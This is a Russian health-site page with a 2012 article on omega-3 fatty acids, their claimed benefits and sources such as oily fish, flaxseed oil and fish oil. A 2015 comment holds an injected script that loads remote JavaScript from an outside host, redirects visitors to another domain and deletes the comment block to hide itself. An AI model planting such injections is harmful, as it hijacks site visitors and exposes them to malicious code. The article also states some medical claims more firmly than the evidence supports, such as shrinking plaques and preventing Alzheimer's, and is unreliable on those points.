Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вкусные лекарства: жирные...  >>  Вкусные лекарства: жирные кислоты
 
Обратная связь
 

Вкусные лекарства: жирные кислоты

Размер шрифта
02 апреля 2012 09:30
  • google_analytics: false
  • Нравится

Чем полезны омега жирные кислоты? Какие продукты богаты жирными кислотами? Как приготовить пищу, чтобы жирные кислоты сохранили свои свойства?

Некоторые полиненасыщенные омега-3 жирные кислоты (альфа-линоленовая, докозогексаеновая, эйкозопентаеновая) крайне полезны для нашего здоровья, что научно доказано многочисленными исследованиями.

  • Эти кислоты предупреждают развитие атеросклероза сосудов, а, значит, - инсультов и инфарктов. Даже при уже существующих атеросклеротических бляшках в артериях, жирные кислоты способствуют выведению избытка холестерина и уменьшению размеров самих бляшек. Ежедневное потребление 2 г рыбьего жира является обыденной профилактикой атеросклероза в развитых странах.
  • Другая важная функция – участие жирных кислот в формировании оболочек (миелиновых) нервных волокон и клеточных мембран в-целом. Миелиновая оболочка – это и есть структура из жирных кислот, которая обеспечивает хорошую проводимость нервных импульсов и, главное, - в правильном направлении.
  • Омега-3 жирные кислоты предупреждают развитие болезни Альцгеймера, одной из форм слабоумия. При этом заболевании нарушаются оболочки нейронов и проводящих путей.

Жирные кислоты разрушаются при жарке. Поэтому нижеперечисленные продукты следует готовить на пару, варить, запекать в фольге или просто есть в сыром виде.

  1. Морская рыба (скумбрия, сельдь, сардины).

 

Эти три вида рыб занимают первое место по содержанию полезных жирных кислот. Один кусочек (порция) 85 г содержит до 2 г жирных кислот (суточная потребность человека). Но на территории России обычно продается такая рыба в соленом или копченом виде. Польза для здоровья возможна только при употреблении свежих сельди, скумбрии или сардин. Соленая рыба повышает артериальное давление, сводя на нет все попытки перейти к здоровому питанию.

  1. Льняное масло

Это масло – источник огромного количества омега-3 ненасыщенных жирных кислот. Льняное масло издревле употребляли в пищу, особенно – на Руси. Льняное масло может стать более полезной заменой обычному растительному маслу на нашей кухне.

  1. Рыбий жир

Рыбий жир теперь можно принимать в виде капсул, а не столовыми ложками, как это было в детстве некоторых. Суточная доза – 2 г рыбьего жира, обеспечивает организм необходимым количеством и предупреждает развитие атеросклероза, слабоумия и нейропатий.

Сюжеты по теме:
Вариант «Омега». Омега-3 жирные кислоты на нашем столе

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

Как сохранить зубы красивыми и десны здоровыми    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.